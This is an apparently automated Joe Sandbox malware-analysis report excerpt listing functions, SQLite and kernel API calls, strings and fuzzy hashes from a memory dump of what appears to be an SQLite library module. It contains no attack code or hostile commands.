sqlite3_mutex_enter.SQLITE3 ref: 61E13DE5
sqlite3_mutex_leave.SQLITE3 ref: 61E13EB9

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leave
String ID:
API String ID: 1477753154-0
Opcode ID: dd0c4e0be379ed07d64cd8f9ca475100c49491bece68170884547eb294548a93
Instruction ID: be87de27b7f937e1f42eb7dd19c174375b15dc7cf7522daf5f5692fed6f68d47
Opcode Fuzzy Hash: dd0c4e0be379ed07d64cd8f9ca475100c49491bece68170884547eb294548a93
Instruction Fuzzy Hash: D1316131E147418FDB00DFBDD88575D77E1B78A328F618569E82497788D735D8C28B41

Function 61E2A53C Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 61E2A54C
sqlite3_log.SQLITE3 ref: 61E2A578

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: mallocsqlite3_log
String ID:
API String ID: 2785431543-0
Opcode ID: 695a80355156f7a29082b027627a12eb7ce4bd07d8bf2a901d1447d00722cb9b
Instruction ID: 6a7598dc0bb923331129e97276a2f71f3813a2265cc023322aba54f33bd75358
Opcode Fuzzy Hash: 695a80355156f7a29082b027627a12eb7ce4bd07d8bf2a901d1447d00722cb9b
Instruction Fuzzy Hash: A5F015B084930A9BCB009FA5D9C150EBBE4AB84248F14C46DD9884B210E334E580CB91

Non-executed Functions

Function 61E96CB6 Relevance: 45.9, APIs: 16, Strings: 10, Instructions: 447COMMON

Download Yara Rule

APIs

sqlite3_step.SQLITE3 ref: 61E96D22
sqlite3_bind_int.SQLITE3 ref: 61E96D52

Part of subcall function 61E2D4C2: sqlite3_bind_int64.SQLITE3 ref: 61E2D4E1

sqlite3_malloc.SQLITE3 ref: 61E96DAB
memcmp.MSVCRT ref: 61E96E7E
sqlite3_finalize.SQLITE3 ref: 61E96EC6
sqlite3_free.SQLITE3 ref: 61E96ED0
sqlite3_prepare_v2.SQLITE3 ref: 61E96FA1
sqlite3_free.SQLITE3 ref: 61E96FB9

Part of subcall function 61E0AE03: sqlite3_mutex_enter.SQLITE3 ref: 61E0AE22

sqlite3_free.SQLITE3 ref: 61E96FCB

Part of subcall function 61E2D93D: sqlite3_bind_value.SQLITE3(?,?,?,?,61E2D9E3), ref: 61E2D971

sqlite3_step.SQLITE3 ref: 61E97093
sqlite3_reset.SQLITE3 ref: 61E9709E
sqlite3_reset.SQLITE3 ref: 61E970BE
sqlite3_stricmp.SQLITE3 ref: 61E9710F
sqlite3_malloc.SQLITE3 ref: 61E9711E
sqlite3_step.SQLITE3 ref: 61E97227
sqlite3_reset.SQLITE3 ref: 61E9722F

Strings

bua, xrefs: 61E96F3B
idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END , xrefs: 61E971C8
= ?, xrefs: 61E9716E
SET , xrefs: 61E96F2B
WHERE , xrefs: 61E96F54
UPDATE main., xrefs: 61E96F08
IS ?, xrefs: 61E971E9
sqlite_stat1, xrefs: 61E97101
bua, xrefs: 61E96F65
AND , xrefs: 61E97201

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_freesqlite3_resetsqlite3_step$sqlite3_malloc$memcmpsqlite3_bind_intsqlite3_bind_int64sqlite3_bind_valuesqlite3_finalizesqlite3_mutex_entersqlite3_prepare_v2sqlite3_stricmp
String ID: = ?$ AND $ IS ?$ SET $ WHERE $UPDATE main.$bua$bua$idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END $sqlite_stat1
API String ID: 2221842524-1341641573
Opcode ID: f262ad0361f032aa36716e0d2ce64c2763df635659657cfb7318623c79f25978
Instruction ID: f11a2dafa0fd8d238889d8e0e027dc0fcc77a1566328dc2a80c80fd3119b464c
Opcode Fuzzy Hash: f262ad0361f032aa36716e0d2ce64c2763df635659657cfb7318623c79f25978
Instruction Fuzzy Hash: B012E674E042599FDB04DFA8D480A9DBBF2BF88308F25C869E854AB354D774E885CF91

Function 61E216E1 Relevance: 10.7, APIs: 7, Instructions: 247COMMON

Download Yara Rule

APIs

sqlite3_value_int.SQLITE3 ref: 61E21736
sqlite3_value_bytes.SQLITE3 ref: 61E21756
sqlite3_value_blob.SQLITE3 ref: 61E21763
sqlite3_value_text.SQLITE3 ref: 61E2177A
sqlite3_value_int.SQLITE3 ref: 61E217CA
sqlite3_result_text64.SQLITE3 ref: 61E2191A
sqlite3_result_blob64.SQLITE3 ref: 61E21974

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
String ID:
API String ID: 3992148849-0
Opcode ID: d5c858093c431b29f645a23dff97c23071af137f23373f22ae86f3e748476ba9
Instruction ID: 4d75e7ab36bb13522fb59acdf735bf5d59b82cd7b6a7118e4330ea45b208334e
Opcode Fuzzy Hash: d5c858093c431b29f645a23dff97c23071af137f23373f22ae86f3e748476ba9
Instruction Fuzzy Hash: 47916375E042498FDB15CFE8C8A069DFBF1BF8A324F29C229D86597380D772D9428B51

Function 61E9727C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 61E96CB6: sqlite3_step.SQLITE3 ref: 61E96D22
Part of subcall function 61E96CB6: sqlite3_reset.SQLITE3 ref: 61E9722F

sqlite3_exec.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E9731D
sqlite3_bind_int.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E97361
sqlite3_step.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E97373
sqlite3_reset.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E9737E
sqlite3_exec.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E973D4

Part of subcall function 61E96CB6: sqlite3_bind_int.SQLITE3 ref: 61E96D52
Part of subcall function 61E96CB6: sqlite3_malloc.SQLITE3 ref: 61E96DAB

Strings

Da, xrefs: 61E973C9

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_bind_intsqlite3_execsqlite3_resetsqlite3_step$sqlite3_malloc
String ID: Da
API String ID: 2693154877-353812989
Opcode ID: 4a5de7812d9ca0e034a8b23f741b8d1cdff61f9155018db5a152457a1a1df20b
Instruction ID: 91fbb99474d6375808db5deaadd5f16ccd0da947af919604f847e92625fdd2a1
Opcode Fuzzy Hash: 4a5de7812d9ca0e034a8b23f741b8d1cdff61f9155018db5a152457a1a1df20b
Instruction Fuzzy Hash: 2741B2B4A087459BDB00DF69C59475EBBE5AB88358F20C82DE8888B344E779D845CB92

Function 61EAF420 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 61EAF459
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF46A
GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF472
GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF47A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF489

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 11ba3c5eec943ccd272f0a4fc468b32cfef13cd0c029082f67a55811cb38d485
Instruction ID: 34e01aa3372b669c320361ac04f9ae784f851c662aaaa29ec4a8842016cb94ae
Opcode Fuzzy Hash: 11ba3c5eec943ccd272f0a4fc468b32cfef13cd0c029082f67a55811cb38d485
Instruction Fuzzy Hash: 9B1170B29553118FCB00EFB9E58855BBBE0FB89655F05093AE548CB200EB35D9898B92

Function 61E8CCB3 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 193COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E8CCCC
sqlite3_mutex_leave.SQLITE3 ref: 61E8CF0C

Strings

BINARY, xrefs: 61E8CDCD, 61E8CDE2
9ua, xrefs: 61E8CDE7

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leave
String ID: 9ua$BINARY
API String ID: 1477753154-3775120692
Opcode ID: 0a988ae2c1cbfe439a63c55b77ae62d08da5f639a886bc00b235b80a8ce27665
Instruction ID: c329798fc438b5f7fce6e21f659767eabecf43e722d33c7b0614ba381d96e56c
Opcode Fuzzy Hash: 0a988ae2c1cbfe439a63c55b77ae62d08da5f639a886bc00b235b80a8ce27665
Instruction Fuzzy Hash: 088128B5A0460A9FDB41DFA9C58079EBBF1BF89358F21C529EC58AB390D734D841CB90

Function 61E52D0C Relevance: 6.4, APIs: 4, Instructions: 422COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E52D21

Part of subcall function 61E15474: sqlite3_mutex_try.SQLITE3(?,?,?,61E154F4), ref: 61E15414

sqlite3_mutex_enter.SQLITE3 ref: 61E52D3A
sqlite3_mutex_leave.SQLITE3 ref: 61E52E52
sqlite3_mutex_leave.SQLITE3 ref: 61E5325D

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
String ID:
API String ID: 2068833801-0
Opcode ID: 2171d3cbc7344143ceaf3a3728bf5bc58960b22335d3b03933afc4e7876b7eee
Instruction ID: 0ac5b7dac66fe8556ff013b7dcb3590d236be3a756f3172e88a954cfa340cabf
Opcode Fuzzy Hash: 2171d3cbc7344143ceaf3a3728bf5bc58960b22335d3b03933afc4e7876b7eee
Instruction Fuzzy Hash: B2021774A04246CFDF49CFA8C590A9DBBF2AF98318F25C059E805AB355DB36EC52CB50

Function 61E2D83D Relevance: 4.6, APIs: 3, Instructions: 84COMMON

Download Yara Rule

APIs

sqlite3_bind_int64.SQLITE3 ref: 61E2D87F

Part of subcall function 61E2D473: sqlite3_mutex_leave.SQLITE3 ref: 61E2D4B2

sqlite3_bind_double.SQLITE3 ref: 61E2D8B6

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_mutex_leave
String ID:
API String ID: 1465616180-0
Opcode ID: 37ab0d498e6869f1248f18525f82ea8c3addd781597051de19eda25eeb30940a
Instruction ID: 41bcc8a0a6bfa9d877d42f62e1b2fba79494af321e558fc8d40f3248755d491d
Opcode Fuzzy Hash: 37ab0d498e6869f1248f18525f82ea8c3addd781597051de19eda25eeb30940a
Instruction Fuzzy Hash: 9C318DB85087559BDB049F58C4A02AAFBE1FF89320F24C95EEEAC4B395D334D451CB42

Function 61E2D60E Relevance: 4.5, APIs: 3, Instructions: 44COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E2D628
sqlite3_bind_zeroblob.SQLITE3 ref: 61E2D64D
sqlite3_mutex_leave.SQLITE3 ref: 61E2D66D

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_bind_zeroblobsqlite3_mutex_entersqlite3_mutex_leave
String ID:
API String ID: 2187339821-0
Opcode ID: 97cbfa6a907e55dae8401866b1d15889492c98cb2e246ce72649cc570ac47a2c
Instruction ID: a879c30e9ce41eaaceb6b114e7a07da607cc389c7e44a330f64faabe5f88e836
Opcode Fuzzy Hash: 97cbfa6a907e55dae8401866b1d15889492c98cb2e246ce72649cc570ac47a2c
Instruction Fuzzy Hash: DB012878A04655CFCB00DFA9D0D0A5ABBF5FF89724B24C46AE9589B314C730E895CB92

Function 61E2D519 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 61E2D302: sqlite3_log.SQLITE3 ref: 61E2D330

sqlite3_mutex_leave.SQLITE3 ref: 61E2D584

Strings

bua, xrefs: 61E2D551

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_logsqlite3_mutex_leave
String ID: bua
API String ID: 1465156292-3993766197
Opcode ID: 633315b2ebd987899b0574c5a9c2535cb517164b27f88ba4281f08561b9dd3a8
Instruction ID: dcc121bbeaeb9a3df0a04655bea2f6dc7fc2ed02cd658be219c642264ca14395
Opcode Fuzzy Hash: 633315b2ebd987899b0574c5a9c2535cb517164b27f88ba4281f08561b9dd3a8
Instruction Fuzzy Hash: 1C112A74A0434ACBCB04CF69D5C098ABBE4FF88268F248529ED48CB300D374E991CB91

Function 61E1307A Relevance: 3.1, APIs: 2, Instructions: 72COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E13008
sqlite3_mutex_leave.SQLITE3 ref: 61E1306B

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leave
String ID:
API String ID: 1477753154-0
Opcode ID: c64f7b8c51c62b54efd56ab6bad003e53cb31ac4e0fdcd4b3bc654b4e6370cea
Instruction ID: cd6f9cc98154ae7641c37afb364d030496269a93b5cff936f97c8a947f86f196
Opcode Fuzzy Hash: c64f7b8c51c62b54efd56ab6bad003e53cb31ac4e0fdcd4b3bc654b4e6370cea
Instruction Fuzzy Hash: C6215130904245CFCB04DFA9C485BE9BBF4FF49324F2481A9E819AB392D375E985CB90

Function 61E0B431 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E0B447
sqlite3_mutex_leave.SQLITE3 ref: 61E0B492

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leave
String ID:
API String ID: 1477753154-0
Opcode ID: ba9cc90e5a21082ad6c2295b21ce38250c8b9c469be8e37a4c4f460e4ebd293f
Instruction ID: f77352582697cf63471e0c4c8f40e3a4f494cd20e5c99f7e715a2ca9bff404d5
Opcode Fuzzy Hash: ba9cc90e5a21082ad6c2295b21ce38250c8b9c469be8e37a4c4f460e4ebd293f
Instruction Fuzzy Hash: 4C01F93A904650CFC7009F65C4C0699BBB5FF85319F19C16ADC584F346D734D592CB91

Function 61E2D5A1 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 61E2D302: sqlite3_log.SQLITE3 ref: 61E2D330

sqlite3_mutex_leave.SQLITE3 ref: 61E2D5FF

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_logsqlite3_mutex_leave
String ID:
API String ID: 1465156292-0
Opcode ID: e0c3ebf914bd4d94a51e339c97bb43ea5b9a0e5b7f07c667420d66bd9099e7be
Instruction ID: c66fd766a958f42aa4ac2fbf66a76d8992794d073e0ccc2415a746ac61fafbe2
Opcode Fuzzy Hash: e0c3ebf914bd4d94a51e339c97bb43ea5b9a0e5b7f07c667420d66bd9099e7be
Instruction Fuzzy Hash: 25016D34A0030A8BC704DF6AC4C4A5AFBB4FF88368F14C569D8088B301D3B4E996CBD0

Function 61E2D473 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 61E2D302: sqlite3_log.SQLITE3 ref: 61E2D330

